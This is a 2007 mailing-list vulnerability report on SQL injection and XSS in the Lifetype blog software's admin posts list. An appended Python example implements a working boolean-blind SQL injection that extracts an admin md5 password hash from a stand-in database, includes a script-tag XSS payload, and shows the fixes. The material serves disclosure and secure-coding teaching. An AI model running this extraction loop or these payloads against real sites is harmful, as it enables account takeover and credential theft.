[pLog-svn] [Lifetype] Multiple SQL Injections in Admin Posts List interfaces & a XSS vuln

Matt Wood matt at woodzy.com
Mon Jul 16 22:30:35 EDT 2007


I was playing with the new ajax "build" earlier today and the new pretty YUI
components and found a couple of problems with stuff unrelated & related to the
ajax stuff [I noticed that most inputs were verified by oscar :), from
those plog-svn change-sets].

I've verified these attacks work but truthfully the only important cases
exist when you allow public registration for a blog through the lifetype
core (or have an untrusted user base), since in order to exploit these
vulnerabilities you must have a valid session.

There are many parameters passed into AdminPostsListView from
AdminEditPostsAction.class.php which are not validated and lead to SQL
injection attacks (recovering the admin's md5 password hash for example).

In the performAjax() and perform() methods:
---
lifetype-1.3-ajax/class/action/admin/admineditpostsaction.class.php:

                  "showMonth" => $this->_request->getValue( "showMonth" ),
---
which is passed into the following, again unverified...
---
lifetype-1.3-ajax/class/view/admin/adminpostslistview.class.php:

        $this->_showMonth = $this->_getParameter( $params, "showMonth",
            $this->_locale->formatDate( new Timestamp(), "%Y%m" ));
---
This leads to SQL injection on almost all of the variables here... You can
easily verify this by checking the mysql logs and by looking at the query
string before it's sent to the database. Since this injection is in the WHERE
clause, many bad things can occur. The most pervasive of which are
blind SQL attacks on the password hashes.


These parameters are also echoed onto the web page unfiltered...
---
lifetype-1.3-ajax/class/view/admin/adminpostslistview.class.php:

        $pager = new Pager(
            "?op=editPosts&showMonth={$this->_showMonth}&amp;showStatus={$this->_showStatus}&showCategory={$this->_showCategory}&showUser={$this->_showUser}&searchTerms={$this->_searchTerms}&showLocation={$this->_locationId}&page="
---
leading to XSS with some clever parameters that require the pager to
actually display links.


On the severity...
The XSS vuln is not really that important... but even with a semi-trusted
userbase the SQL injections could lead to the admin having his password
discovered.


-Matt
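The two problems described in the message, as an added example that is not part of the original post or of the Lifetype code base: a WHERE clause built by string interpolation from the showMonth request value, the boolean-based blind extraction of an md5 password hash that such a clause permits, and the two fixes a practitioner would apply (whitelist the value's shape and bind it as a query parameter; url-encode and HTML-escape the values that go into the pager href). The table and column names, the in-memory SQLite database and the admin password are constructed stand-ins for this example, not Lifetype's real schema.

```python
import hashlib
import html
import re
import sqlite3
from urllib.parse import urlencode

# Constructed sample data; the schema is an assumption for this example,
# not Lifetype's real tables.
ADMIN_HASH = hashlib.md5(b"correct horse").hexdigest()


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, user TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES (1, 'admin', ?)", (ADMIN_HASH,))
    db.execute("CREATE TABLE articles (id INTEGER, user_id INTEGER, date TEXT)")
    db.execute("INSERT INTO articles VALUES (1, 1, '200707')")
    return db


def vulnerable_where(show_month):
    # Mirrors the pattern in the post: the raw request value lands inside
    # the quotes of the WHERE clause, so a single quote breaks out of it.
    return f"SELECT id FROM articles WHERE date = '{show_month}'"


def blind_extract_hash(db, length=32):
    """Boolean-based blind SQL injection through showMonth.

    Each probe appends one more hex digit to the prefix recovered so far and
    asks the database whether that prefix is right; whether any article row
    comes back is the yes/no oracle. 32 hex digits need at most 512 requests.
    """
    known = ""
    alphabet = "0123456789abcdef"
    while len(known) < length:
        for ch in alphabet:
            guess = known + ch
            payload = (
                "200707' AND (SELECT substr(password,1,%d) FROM users "
                "WHERE user='admin') = '%s" % (len(guess), guess)
            )  # the template's closing quote completes the final string
            if db.execute(vulnerable_where(payload)).fetchall():
                known = guess
                break
        else:
            raise RuntimeError("no digit matched; oracle assumption broken")
    return known


MONTH_RE = re.compile(r"\d{6}")


def safe_where(db, show_month):
    """Hardened form: reject anything that is not YYYYMM, then bind it."""
    if not MONTH_RE.fullmatch(show_month):
        raise ValueError("showMonth must be YYYYMM")
    return db.execute(
        "SELECT id FROM articles WHERE date = ?", (show_month,)
    ).fetchall()


def vulnerable_pager_link(params):
    # Same string interpolation as the Pager constructor in the post:
    # values go into the href untouched.
    return (
        "?op=editPosts&showMonth={showMonth}&amp;showStatus={showStatus}"
        "&searchTerms={searchTerms}&page="
    ).format(**params)


def safe_pager_link(params):
    # url-encode each value so it cannot add or alter query parameters,
    # then HTML-escape the whole href so it cannot break out of the attribute.
    query = urlencode({"op": "editPosts", **params})
    return html.escape("?" + query + "&page=", quote=True)


if __name__ == "__main__":
    db = make_db()
    print("recovered:", blind_extract_hash(db))
    xss = {"showMonth": '"><script>alert(1)</script>', "showStatus": "1",
           "searchTerms": "x"}
    print("vulnerable:", vulnerable_pager_link(xss))
    print("safe:      ", safe_pager_link(xss))
```

The oracle here is "did the pager get any rows back"; in the real interface it would be whether the post list shows entries for that month, which is exactly why a valid session is enough to run the attack against an admin's hash.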

